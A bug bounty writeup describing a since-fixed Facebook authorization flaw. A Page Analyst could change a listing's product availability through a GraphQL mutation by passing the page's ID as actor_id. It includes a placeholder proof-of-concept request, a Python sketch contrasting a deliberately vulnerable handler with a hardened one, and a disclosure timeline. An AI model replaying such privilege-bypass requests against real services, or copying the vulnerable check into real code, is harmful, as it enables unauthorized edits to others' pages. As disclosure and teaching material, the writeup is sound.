Facebook Change Product Availability as a PageAnalyst

25 Jan 2019 - onehackzero

Description

   A Page Analyst is the lowest-privilege page role: it can view insights and see who published as the page, but it cannot publish or edit on the page's behalf. This bug let a malicious Page Analyst modify the availability of an item the page had put up for sale in a group linked to the page, by sending the mutation below with the page's ID as the actor.

Proof of Concept

HTTP POST, sent while logged in as a user who holds only the Page Analyst role on the page:

graph.facebook.com/graphql/

query_id=QUERYID
query_params={
  "3": "false",
  "1": "image/jpeg",
  "2": 2,
  "0": {
    "surface": "GROUP_POST_CHEVRON",
    "actor_id": "PageID",
    "client_mutation_id": "",
    "product_availability": "IN_STOCK",
    "story_id": "<base64 encoded>"
  }
}

QUERYID, PageID and the base64-encoded story_id are placeholders for the query's ID, the page's ID and the target post's ID.
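The server-side check this report implies was missing, as an added example that is not part of the original writeup and not Facebook's code: a mutation that takes actor_id from the client must confirm both that the listing belongs to that page and that the caller's role on the page permits the edit. Role names follow Facebook's page roles; the permission mapping, the Store model, the user and page IDs, and any availability value other than IN_STOCK are assumptions.

```python
# Added illustration, not Facebook's code: a minimal authorization model for a
# "change product availability" mutation, with the assumed vulnerable check
# beside a hardened version.
from dataclasses import dataclass
from enum import Enum


class PageRole(Enum):
    ADMIN = "ADMIN"
    EDITOR = "EDITOR"
    MODERATOR = "MODERATOR"
    ADVERTISER = "ADVERTISER"
    ANALYST = "ANALYST"


# Assumed: only roles allowed to publish as the page may edit its listings.
# Analyst is insight-only, so it is deliberately absent.
LISTING_EDITOR_ROLES = {PageRole.ADMIN, PageRole.EDITOR}

# Assumed enumeration; the report only shows IN_STOCK.
ALLOWED_AVAILABILITY = {"IN_STOCK", "OUT_OF_STOCK"}


class Forbidden(Exception):
    """Raised when the caller may not perform the mutation."""


@dataclass
class Listing:
    story_id: str             # the post that advertises the item
    page_id: str              # the page that owns the listing
    product_availability: str


@dataclass
class Store:
    roles: dict               # (user_id, page_id) -> PageRole
    listings: dict            # story_id -> Listing


def update_availability_vulnerable(store, user_id, actor_id, story_id, availability):
    """Assumed vulnerable behaviour: the client-supplied actor_id is trusted as
    long as the caller holds *any* role on that page, Analyst included."""
    if (user_id, actor_id) not in store.roles:
        raise Forbidden("caller has no role on the page")
    listing = store.listings[story_id]
    listing.product_availability = availability
    return listing


def update_availability_fixed(store, user_id, actor_id, story_id, availability):
    """Hardened version: the listing must belong to actor_id, the caller's role
    on that page must allow editing listings, and the new value must be valid."""
    listing = store.listings[story_id]
    if listing.page_id != actor_id:
        raise Forbidden("actor_id does not own this listing")
    role = store.roles.get((user_id, actor_id))
    if role not in LISTING_EDITOR_ROLES:
        raise Forbidden(f"role {role} may not edit listings")
    if availability not in ALLOWED_AVAILABILITY:
        raise ValueError(f"invalid availability {availability!r}")
    listing.product_availability = availability
    return listing


def build_store():
    """Constructed sample data: one page with an admin and an analyst, one listing."""
    return Store(
        roles={("admin_user", "page123"): PageRole.ADMIN,
               ("analyst_user", "page123"): PageRole.ANALYST},
        listings={"story_abc": Listing("story_abc", "page123", "IN_STOCK")},
    )


def analyst_can_change(handler):
    """Run the handler as the analyst and report whether the change went through."""
    store = build_store()
    try:
        handler(store, "analyst_user", "page123", "story_abc", "OUT_OF_STOCK")
    except Forbidden:
        return False
    return store.listings["story_abc"].product_availability == "OUT_OF_STOCK"


if __name__ == "__main__":
    print("vulnerable handler, analyst:", analyst_can_change(update_availability_vulnerable))
    print("fixed handler, analyst:     ", analyst_can_change(update_availability_fixed))
```

The ownership check (listing.page_id == actor_id) matters as much as the role check: without it, a user with an editor role on some other page could pass the role check while pointing actor_id at their own page and story_id at this page's post.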

Timeline

  • Jan 4, 2019 - Report Sent
  • Jan 10, 2019 - Further investigation by Facebook
  • Jan 23, 2019 - Fixed by Facebook
  • Jan 25, 2019 - Bounty Awarded by Facebook